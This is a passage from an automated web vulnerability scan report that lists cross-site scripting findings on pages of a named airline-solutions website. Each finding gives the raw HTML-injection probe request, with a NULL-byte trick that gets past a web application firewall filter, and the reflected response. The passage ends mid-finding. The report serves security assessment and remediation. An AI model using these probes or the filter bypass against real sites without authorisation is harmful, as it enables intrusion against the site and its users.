Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d1fb2"><a>4652b7d32bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fb2"><a>4652b7d32bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues?%00d1fb2"><a>4652b7d32bc=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:37:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318265; expires=Wed, 05-Oct-2011 17:37:45 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fbusiness_issues%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:38:08 GMT
Pragma: no-cache
Content-Length: 7122
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues?%00d1fb2"><a>4652b7d32bc=1">
...[SNIP]...

3.40. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005ebe9<a>5d4d5d49d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ebe9<a>5d4d5d49d0a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management?%005ebe9<a>5d4d5d49d0a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:24:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321561; expires=Thu, 06-Oct-2011 10:24:11 GMT; path=/
Set-Cookie: exp_last_activity=1286378651; expires=Thu, 06-Oct-2011 10:24:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:24:29 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>5d4d5d49d0a=1">fuel management?%005ebe9<a>5d4d5d49d0a=1</a>
...[SNIP]...

3.41. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0035c4b"><a>50f74342d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35c4b"><a>50f74342d82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management?%0035c4b"><a>50f74342d82=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:21:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321561; expires=Thu, 06-Oct-2011 10:21:27 GMT; path=/
Set-Cookie: exp_last_activity=1286378487; expires=Thu, 06-Oct-2011 10:21:27 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:21:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/fuel_management?%0035c4b"><a>50f74342d82=1">
...[SNIP]...

3.42. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c8fc1<a>764063527b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8fc1<a>764063527b4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management/?%00c8fc1<a>764063527b4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:39:16 GMT; path=/
Set-Cookie: exp_last_activity=1286379556; expires=Thu, 06-Oct-2011 10:39:16 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:39:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>764063527b4=1">?%00c8fc1<a>764063527b4=1</a>
...[SNIP]...

3.43. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008775d"><a>c02e51ee33d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8775d"><a>c02e51ee33d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management/?%008775d"><a>c02e51ee33d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:36:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:36:03 GMT; path=/
Set-Cookie: exp_last_activity=1286379363; expires=Thu, 06-Oct-2011 10:36:03 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:36:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/fuel_management/?%008775d"><a>c02e51ee33d=1">
...[SNIP]...

3.44. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/irregular_operations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004e1af<a>077d95e6518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e1af<a>077d95e6518 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/irregular_operations/?%004e1af<a>077d95e6518=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:53:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322256; expires=Thu, 06-Oct-2011 10:53:09 GMT; path=/
Set-Cookie: exp_last_activity=1286380389; expires=Thu, 06-Oct-2011 10:53:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:53:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>077d95e6518=1">?%004e1af<a>077d95e6518=1</a>
...[SNIP]...

3.45. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/irregular_operations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0059277"><a>214029d358f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59277"><a>214029d358f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/irregular_operations/?%0059277"><a>214029d358f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322256; expires=Thu, 06-Oct-2011 10:49:56 GMT; path=/
Set-Cookie: exp_last_activity=1286380195; expires=Thu, 06-Oct-2011 10:49:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:50:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/irregular_operations/?%0059277"><a>214029d358f=1">
...[SNIP]...

3.46. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bf7e1"><a>9d7b30f12ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf7e1"><a>9d7b30f12ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues?%00bf7e1"><a>9d7b30f12ab=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:37:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321529; expires=Thu, 06-Oct-2011 10:37:25 GMT; path=/
Set-Cookie: exp_last_activity=1286379444; expires=Thu, 06-Oct-2011 10:37:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:37:55 GMT
Pragma: no-cache
Content-Length: 6974
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/other_airline_issues?%00bf7e1"><a>9d7b30f12ab=1">
...[SNIP]...

3.47. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f61d7<a>7f1e076aefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f61d7<a>7f1e076aefd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

